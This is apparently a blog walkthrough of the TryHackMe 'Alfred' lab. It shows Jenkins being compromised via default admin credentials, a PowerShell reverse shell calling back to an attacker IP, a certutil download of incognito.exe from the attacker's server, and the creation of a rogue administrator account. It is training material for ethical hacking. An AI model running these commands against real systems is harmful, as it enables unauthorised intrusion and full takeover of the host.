You dont have javascript enabled! Please enable it!

Alfred – TryHackMe – Manual Writeup

Reading Time: ( Word Count: )

February 22, 2021

Intro

We’ll exploit a common misconfiguration on a widely used automation server (Jenkins) and gain access through windows tokens.

 

Enumeration

 

Nmap scan

  ┌──(kali㉿kali)-[~]      └─$ export IP=10.10.117.45   ┌──(kali㉿kali)-[~]      └─$ nmap -p- -A -Pn -v $IP
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Site doesn't have a title (text/html). 3389/tcp open tcpwrapped | ssl-cert: Subject: commonName=alfred | Issuer: commonName=alfred | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2020-10-02T14:42:05 | Not valid after: 2021-04-03T14:42:05 | MD5: fdb2 cd17 fad1 160d 06bc c1d8 31f3 7636 |_SHA-1: 6577 409f 2b1a 3e36 7ca7 4449 57f2 98c1 8750 3a3e |_ssl-date: 2021-02-06T18:18:26+00:00; -1s from scanner time. 8080/tcp open http Jetty 9.4.z-SNAPSHOT |_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1 | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Site doesn't have a title (text/html;charset=utf-8).

Nothing interesting on port 80, an open RDP port on 3389 and another http web server on port 8080 with a login form. Trying to login with admin:admin succeeds.

Exploitation

Remote Code Execution

After checking out the tool, I found a way to execute commands on the underlying system:

1. Click on “project” on the start page:

 

2. “Configure” on the left side:

 

2.1 Configure your reverse shell script, start a listener & http server:

  ┌──(kali㉿kali)-[~]      └─$ cat revsh.ps1 $client = New-Object System.Net.Sockets.TCPClient('10.8.152.223',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); } $client.Close();   ┌──(kali㉿kali)-[~]      └─$ sudo nc -nlvp 443   ┌──(kali㉿kali)-[~]      └─$ python3 -m http.server 5300

 

3. Scroll down and enter your command in the “Command” field & Save:

 

4. After clicking on “Build”, you should get a reverse shell:

listening on [any] 443 ... connect to [10.8.152.221] from (UNKNOWN) [10.10.117.45] 50077 PS C:\Program Files (x86)\Jenkins\workspace\project> whoami alfred\bruce PS C:\Program Files (x86)\Jenkins\workspace\project>

Privilege Escalation

PS > whoami /priv
PRIVILEGES INFORMATION ---------------------- Privilege Name Description State =============================== ========================================= ======== SeDebugPrivilege Debug programs Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled

SeDebugPrivilege & SeCreateGlobalPrivilege are enabled for bruce. These tokens will enable us to impersonate another user or even create one and assign it with administrative privileges.

 

We’ll need to download a binary called incognito.exe to get this to work. We can afterwards transfer it from a local http server.

  ┌──(kali㉿kali)-[~]      └─$ python3 -m http.server 5300
PS > certutil.exe -urlcache -split -f "http://10.8.152.221:5300/incognito.exe" incognito.exe

Now that we’ve downloaded the binary to the target machine, we can use it to add a user. 

PS > ./incognito.exe add_user nextdoorsec passwordd
PS > ./incognito.exe add_localgroup_user Administrators nextdoorsec   ┌──(kali㉿kali)-[~]      └─$ rdesktop -u nextdoorsec -p passwordd $IP

We’ve added a user named “nextdoorsec” with a password “passwordd” and afterwards assigned it to the “Administrators” group. To test it out, you can connect to the open RDP port.

author bio

Author bio

Hi there, my name is Aydan, and I share exciting information about cyber security and ethical hacking, a.k.a pen-testing.

Other interesting articles

Can You See Who Views Your Videos On Facebook in 2023?

Can You See Who Views Your Videos On Facebook in 2023?

For ages, Facebook has been one of the most renowned websites and social media platforms. Posting personal images ...
How to Watch Banned YouTube Videos in My Country?

How to Watch Banned YouTube Videos in My Country?

Watching youtube videos for hours is one of the most exciting activities. There could be a moment when you cannot ...
How to Find Deleted Videos on Chromebook?

How to Find Deleted Videos on Chromebook?

Chromebook is becoming popular over the days, and many individuals are now switching to them.  Despite its ...
Is Progressive Snapshot Hack Possible in 2023

Is Progressive Snapshot Hack Possible in 2023

Progressive Snapshot is a free usage-based insurance scheme that tracks and awards safe driving behavior. Contrary ...
0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *

error: Alert: Content is protected !!